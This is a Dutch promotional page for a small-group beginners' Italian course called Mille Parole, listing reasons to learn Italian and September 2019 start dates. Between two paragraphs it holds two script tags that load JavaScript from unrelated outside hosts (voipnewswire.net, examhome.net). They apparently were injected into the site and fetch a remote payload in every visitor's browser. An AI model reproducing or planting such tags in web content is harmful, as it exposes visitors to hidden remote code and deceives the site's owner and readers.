Introductiecursus Italiaans voor beginners

Je bent van plan komende zomer op vakantie te gaan naar Italië. Of je hebt een vakantiehuis in Italië. Misschien wil je een B & B beginnen in Italië. Of je bent dol op de Italiaanse cultuur en wilt eindelijk die mooie liedjes verstaan, of die prachtige boeken in het Italiaans lezen. Wanneer ik de eerste les aan mijn cursisten vroeg waarom ze Italiaans wilden leren, noemden ze onder andere deze redenen op. Behalve dat het erg leuk is van elkaar te horen waarom je Italiaans wilt leren, schept het ook meteen een band. Je hebt immers met z’n allen hetzelfde doel, om welke reden ook. Je wilt leren communiceren in het Italiaans!

Wil jij ook Italiaans leren? Dan ben je bij Mille Parole op de juiste plek beland!

<script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script><script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>

De cursus wordt een keer per week gegeven. De startdatum is vanaf september 2019.

Let op: de cursus van maandagavond 19.00 uur is nagenoeg vol!
Je kunt je nog inschrijven voor de maandagavond vanaf 20.35 uur.
De begindata is 23 september 2019.

Vanaf maandag 23 september 2019 starten er nieuwe cursussen Italiaans voor beginners.
In een professionele en vriendelijke sfeer breng ik je de basiskennis bij waarmee je in Italië uit de voeten kunt. De samenstelling van de groep zal tussen de vijf en tien personen zijn. Doordat de groep klein is, kan ik iedere deelnemer genoeg persoonlijke aandacht geven. Hierdoor krijg je de kans in relatief korte tijd zoveel mogelijk op te steken.